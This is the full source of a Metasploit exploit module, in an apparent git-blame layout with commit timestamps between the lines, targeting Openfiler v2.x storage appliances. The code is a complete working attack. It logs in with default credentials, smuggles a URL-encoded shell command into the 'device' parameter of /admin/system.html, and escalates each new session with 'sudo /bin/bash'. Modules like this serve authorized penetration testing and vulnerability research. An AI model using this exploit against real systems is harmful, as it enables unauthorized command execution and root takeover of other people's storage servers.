2012-09-09 17:28:09 +09:30
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-09-09 17:28:09 +09:30
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2012-09-09 17:28:09 +09:30
|
|
|
Rank = ExcellentRanking
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => "Openfiler v2.x NetworkCard Command Execution",
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability in Openfiler v2.x
|
|
|
|
|
which could be abused to allow authenticated users to execute arbitrary
|
|
|
|
|
code under the context of the 'openfiler' user. The 'system.html' file
|
|
|
|
|
uses user controlled data from the 'device' parameter to create a new
|
|
|
|
|
'NetworkCard' object. The class constructor in 'network.inc' calls exec()
|
|
|
|
|
with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without
|
|
|
|
|
providing a system password.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
2019-01-10 19:19:14 +00:00
|
|
|
'bcoles' # Discovery and exploit
|
2012-09-09 17:28:09 +09:30
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2012-09-12 14:12:59 -05:00
|
|
|
['BID', '55490'],
|
2013-06-05 18:57:33 -05:00
|
|
|
['URL', 'http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/'],
|
2016-07-15 12:00:31 -05:00
|
|
|
['OSVDB', '93881'],
|
2013-06-05 18:57:33 -05:00
|
|
|
['EDB', '21191']
|
2012-09-09 17:28:09 +09:30
|
|
|
],
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
2015-09-01 10:43:45 +02:00
|
|
|
'EXITFUNC' => 'thread'
|
2012-09-09 17:28:09 +09:30
|
|
|
},
|
|
|
|
|
'Platform' => 'unix',
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1024,
|
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
2015-08-10 17:12:59 -05:00
|
|
|
'RequiredCmd' => 'generic telnet python perl',
|
2012-09-09 17:28:09 +09:30
|
|
|
}
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
['Automatic Targeting', { 'auto' => true }]
|
|
|
|
|
],
|
|
|
|
|
'Privileged' => false,
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2012-09-04',
|
2012-09-09 17:28:09 +09:30
|
|
|
'DefaultTarget' => 0))
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(446),
|
|
|
|
|
OptBool.new('SSL', [true, 'Use SSL', true]),
|
|
|
|
|
OptString.new('USERNAME', [true, 'The username for the application', 'openfiler']),
|
|
|
|
|
OptString.new('PASSWORD', [true, 'The password for the application', 'password'])
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
def check
|
|
|
|
|
# retrieve software version from login page
|
2016-02-01 15:12:03 -06:00
|
|
|
vprint_status("Sending check")
|
2012-09-09 17:28:09 +09:30
|
|
|
begin
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'uri' => '/'
|
|
|
|
|
})
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
if res and res.code == 200 and res.body =~ /<strong>Distro Release: <\/strong>Openfiler [NE]SA 2\./
|
|
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
|
elsif res and res.code == 200 and res.body =~ /<title>Openfiler Storage Control Center<\/title>/
|
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
2016-02-01 15:12:03 -06:00
|
|
|
vprint_error("Connection failed")
|
2014-01-22 11:20:10 -06:00
|
|
|
return Exploit::CheckCode::Unknown
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
2014-01-22 11:20:10 -06:00
|
|
|
return Exploit::CheckCode::Safe
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
def on_new_session(client)
|
|
|
|
|
client.shell_command_token("sudo /bin/bash")
|
|
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
|
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
def exploit
|
|
|
|
|
user = datastore['USERNAME']
|
|
|
|
|
pass = datastore['PASSWORD']
|
|
|
|
|
cmd = Rex::Text.uri_encode("&#{payload.raw}&")
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
# send payload
|
2016-02-01 15:12:03 -06:00
|
|
|
print_status("Sending payload (#{payload.raw.length} bytes)")
|
2012-09-09 17:28:09 +09:30
|
|
|
begin
|
|
|
|
|
res = send_request_cgi({
|
2014-05-25 19:29:39 +02:00
|
|
|
'uri' => '/admin/system.html',
|
|
|
|
|
'cookie' => "usercookie=#{user}; passcookie=#{pass};",
|
2015-04-17 13:59:49 -05:00
|
|
|
'encode_params' => false,
|
2014-05-25 19:29:39 +02:00
|
|
|
'vars_get' => {
|
|
|
|
|
'step' => '2',
|
|
|
|
|
'device' => "lo#{cmd}"
|
|
|
|
|
}
|
2012-09-09 17:28:09 +09:30
|
|
|
}, 25)
|
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
2013-08-15 14:14:46 -05:00
|
|
|
fail_with(Failure::Unknown, 'Connection failed')
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
|
2016-02-01 15:12:03 -06:00
|
|
|
print_good("Payload sent successfully")
|
2012-09-09 17:28:09 +09:30
|
|
|
elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
|
2013-08-15 14:14:46 -05:00
|
|
|
fail_with(Failure::NoAccess, 'Authentication failed')
|
2012-09-09 17:28:09 +09:30
|
|
|
else
|
2013-08-15 14:14:46 -05:00
|
|
|
fail_with(Failure::Unknown, 'Sending payload failed')
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2012-09-09 17:28:09 +09:30
|
|
|
end
|
|
|
|
|
end
|
